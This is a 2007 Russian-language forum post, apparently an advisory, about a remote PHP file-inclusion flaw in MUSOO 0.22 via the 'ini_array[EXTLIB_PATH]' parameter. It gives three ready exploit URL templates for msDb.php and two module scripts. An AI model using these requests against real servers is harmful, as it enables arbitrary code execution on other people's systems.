MUSOO 0.22, на других версиях не проверялось...
Уязвимость существует из-за недостаточной обработки входных данных в параметре "ini_array[EXTLIB_PATH]" в сценариях parameter in msDb.php, modules/MusooTemplateLite.php и modules/SoundImporter.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
exp:
http://[host]/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=[file]
http://[host]/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=[file]
http://[host]/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=[file]
Друзья: Всё для вебмастера | [ Реклама на форуме ] |
![]() |
![]() |


PHP-инклюдинг в MUSOO
Автор
aka PSIH
, 21 Jun 2007 02:06
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 анонимных